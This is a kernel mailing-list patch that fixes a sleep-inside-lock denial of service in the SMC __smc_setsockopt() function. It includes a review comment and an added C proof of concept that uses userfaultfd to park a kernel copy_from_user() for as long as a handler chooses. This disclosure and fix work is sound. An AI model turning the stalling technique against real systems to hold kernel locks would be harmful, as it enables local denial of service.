X-Mailing-List: linux-kernel@vger.kernel.org
From: Nicolò Coccia
Date: Sat, 9 May 2026 07:01:02 -0400
Subject: [PATCH net] net/smc: fix sleep-inside-lock in __smc_setsockopt() causing local DoS
To: alibuda@linux.alibaba.com, dust.li@linux.alibaba.com, sidraya@linux.ibm.com, Wenjia Zhang
Cc: Tony Lu, Wen Gu, linux-rdma@vger.kernel.org, linux-s390@vger.kernel.org, linux-kernel@vger.kernel.org, netdev@vger.kernel.org, mjambigi@linux.ibm.com, Nicolò Coccia

A logic flaw in __smc_setsockopt() allows a local unprivileged user to cause a Denial of Service (DoS) by holding the socket lock indefinitely.

The function __smc_setsockopt() calls copy_from_sockptr() while holding lock_sock(sk). By passing a userfaultfd-monitored memory page (or FUSE-backed memory on systems where unprivileged userfaultfd is disabled) as the optval, an attacker can halt execution during the copy operation, keeping the lock held. Combined with asynchronous tear-down operations like shutdown(), this exhausts the kernel wq (kworkers) and triggers the hung task watchdog.

[ 240.123456] INFO: task kworker/u8:2 blocked for more than 120 seconds.
[ 240.123489] Call Trace:
[ 240.123501] smc_shutdown+...
[ 240.123512] lock_sock_nested+...

This patch moves the user-space copy outside the lock_sock() critical section to prevent the issue.

Fixes: a6a6fe27bab4 ("net/smc: Dynamic control handshake limitation by socket options")
Signed-off-by: Nicolò Coccia
---
v1 -> v2:
- Rebased against netdev/net tree
- Added Fixes tag

 net/smc/af_smc.c | 17 ++++++++---------
 1 file changed, 8 insertions(+), 9 deletions(-)

diff --git a/net/smc/af_smc.c b/net/smc/af_smc.c
index 185dbed7de5d..da28652f6810 100644
--- a/net/smc/af_smc.c
+++ b/net/smc/af_smc.c
@@ -3054,18 +3054,17 @@ static int __smc_setsockopt(struct socket *sock, int level, int optname, smc =3D smc_sk(sk); + /* pre-fetch user data outside the lock */ + if (optname =3D=3D SMC_LIMIT_HS) { + if (optlen < sizeof(int)) + return -EINVAL; + if (copy_from_sockptr(&val, optval, sizeof(int))) + return -EFAULT; + } + lock_sock(sk); switch (optname) { case SMC_LIMIT_HS: - if (optlen < sizeof(int)) { - rc =3D -EINVAL; - break; - } - if (copy_from_sockptr(&val, optval, sizeof(int))) { - rc =3D -EFAULT; - break; - } - smc->limit_smc_hs =3D !!val; rc =3D 0; break; --=20 2.51.0
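Review bot: in the new pre-lock block, `val` is only ever written when `optname == SMC_LIMIT_HS`, and the only reader is the `case SMC_LIMIT_HS:` arm below, so the code is correct today but the coupling is invisible at the point of use; please either initialize `val` at its declaration or say in the comment that the copy is keyed on the same optname the switch dispatches on, so that a later option added to the switch does not read an uninitialized `val` by copying the existing case. The comment `/* pre-fetch user data outside the lock */` should also state why the order matters (copy_from_sockptr() can fault and sleep, so it must not run under lock_sock()); that is the whole point of the fix and is currently only in the commit message. Returning -EINVAL/-EFAULT directly instead of through `rc` is fine here since no lock is held yet. Minor: the changelog says "v1 -> v2" but the subject is still "[PATCH net]" without a v2 marker.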
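The commit message relies on one primitive: a syscall that copies from user memory can be parked in the kernel for as long as a userfaultfd handler chooses, and any lock taken before that copy stays held with it. The program below is an added example, not part of the patch or of the kernel tree, that shows the primitive on its own. It uses write(2) to a pipe as the victim syscall instead of setsockopt() on an SMC socket (no SMC is needed; the fault path is the same copy_from_user()), a forked child as the fault handler, and hold times and result codes (`stall_copy_with_uffd`, `STALL_*`) that are this example's own names. It needs a userfaultfd that handles kernel-mode faults, i.e. root/CAP_SYS_PTRACE or vm.unprivileged_userfaultfd=1; otherwise userfaultfd() fails and the example reports that instead of demonstrating the stall, which is the situation the commit message describes as the reason FUSE-backed memory is the unprivileged fallback.

```c
/* Added example (not from the patch): park a kernel copy_from_user() on a
 * userfaultfd-registered page. The victim here is write(2) on a pipe,
 * standing in for setsockopt(SMC_LIMIT_HS) under lock_sock(). */
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <errno.h>
#include <fcntl.h>
#include <poll.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>
#ifdef __linux__
#include <linux/userfaultfd.h>
#endif

/* Result codes of this example (assumed names, not kernel ones). */
enum { STALL_DEMONSTRATED = 0, STALL_UNAVAILABLE = 1, STALL_FAILED = 2 };

static long ms_since(const struct timespec *t0)
{
	struct timespec t1;
	clock_gettime(CLOCK_MONOTONIC, &t1);
	return (t1.tv_sec - t0->tv_sec) * 1000L + (t1.tv_nsec - t0->tv_nsec) / 1000000L;
}

#ifdef __linux__
/* Fault handler, run in a forked child that inherited the uffd fd: wait for
 * the victim's fault, sit on it for hold_ms, then resolve it with UFFDIO_COPY.
 * While it sits, the victim task sleeps inside the kernel copy. */
static int serve_one_fault(int uffd, long page, int hold_ms)
{
	struct pollfd pfd = { .fd = uffd, .events = POLLIN };
	struct uffd_msg msg;
	void *src = mmap(NULL, page, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);

	if (src == MAP_FAILED || poll(&pfd, 1, 5000) != 1)
		return 1;
	if (read(uffd, &msg, sizeof(msg)) != (ssize_t)sizeof(msg) || msg.event != UFFD_EVENT_PAGEFAULT)
		return 1;
	usleep((useconds_t)hold_ms * 1000);   /* the victim is blocked in the kernel now */
	struct uffdio_copy cp = {
		.dst = msg.arg.pagefault.address & ~((__u64)page - 1),
		.src = (__u64)(unsigned long)src, .len = page, .mode = 0,
	};
	return ioctl(uffd, UFFDIO_COPY, &cp) < 0 ? 1 : 0;
}
#endif

/* Returns STALL_DEMONSTRATED when the victim syscall blocked for at least
 * hold_ms (measured time stored in *blocked_ms), STALL_UNAVAILABLE when
 * userfaultfd() cannot be opened here (EPERM: unprivileged uffd disabled;
 * ENOSYS: kernel or seccomp), STALL_FAILED on any other error. */
int stall_copy_with_uffd(int hold_ms, long *blocked_ms)
{
#ifndef __linux__
	(void)hold_ms; (void)blocked_ms;
	return STALL_UNAVAILABLE;
#else
	long page = sysconf(_SC_PAGESIZE);
	int uffd = (int)syscall(SYS_userfaultfd, O_CLOEXEC | O_NONBLOCK);
	int pfd[2], status, rc = STALL_FAILED;
	pid_t child;

	if (uffd < 0)
		return STALL_UNAVAILABLE;

	/* The "optval": a never-touched anonymous page, so the first access faults
	 * into the handler instead of being filled by the kernel. */
	void *optval = mmap(NULL, page, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
	struct uffdio_api api = { .api = UFFD_API, .features = 0 };
	struct uffdio_register reg = {
		.range = { .start = (unsigned long)optval, .len = page },
		.mode = UFFDIO_REGISTER_MODE_MISSING,
	};
	if (optval == MAP_FAILED || ioctl(uffd, UFFDIO_API, &api) < 0 ||
	    ioctl(uffd, UFFDIO_REGISTER, &reg) < 0 || pipe(pfd) < 0 || (child = fork()) < 0)
		goto out;
	if (child == 0)
		_exit(serve_one_fault(uffd, page, hold_ms));

	/* Victim: the kernel copy_from_user()s one byte of the registered page. */
	struct timespec t0;
	clock_gettime(CLOCK_MONOTONIC, &t0);
	ssize_t n = write(pfd[1], optval, 1);
	*blocked_ms = ms_since(&t0);

	if (waitpid(child, &status, 0) == child && WIFEXITED(status) && WEXITSTATUS(status) == 0 &&
	    n == 1 && *blocked_ms >= hold_ms)
		rc = STALL_DEMONSTRATED;
	close(pfd[0]);
	close(pfd[1]);
out:
	if (optval != MAP_FAILED)
		munmap(optval, page);
	close(uffd);
	return rc;
#endif
}

int main(void)
{
	long ms = 0;
	int rc = stall_copy_with_uffd(500, &ms);
	if (rc == STALL_DEMONSTRATED)
		printf("kernel copy stalled for %ld ms at the handler's discretion\n", ms);
	else if (rc == STALL_UNAVAILABLE)
		printf("userfaultfd unavailable here (EPERM/ENOSYS); see vm.unprivileged_userfaultfd\n");
	else
		printf("setup failed\n");
	return rc;
}
```

The measured time is the time the victim spent asleep inside write(2) with the fault unresolved; in the SMC case the same sleep happens inside setsockopt() after lock_sock(sk), which is why every other path that needs the socket lock (the smc_shutdown() worker in the hung-task trace above) piles up behind it. Moving the copy before lock_sock(), as the patch does, means the stall still happens but nothing is held while it does.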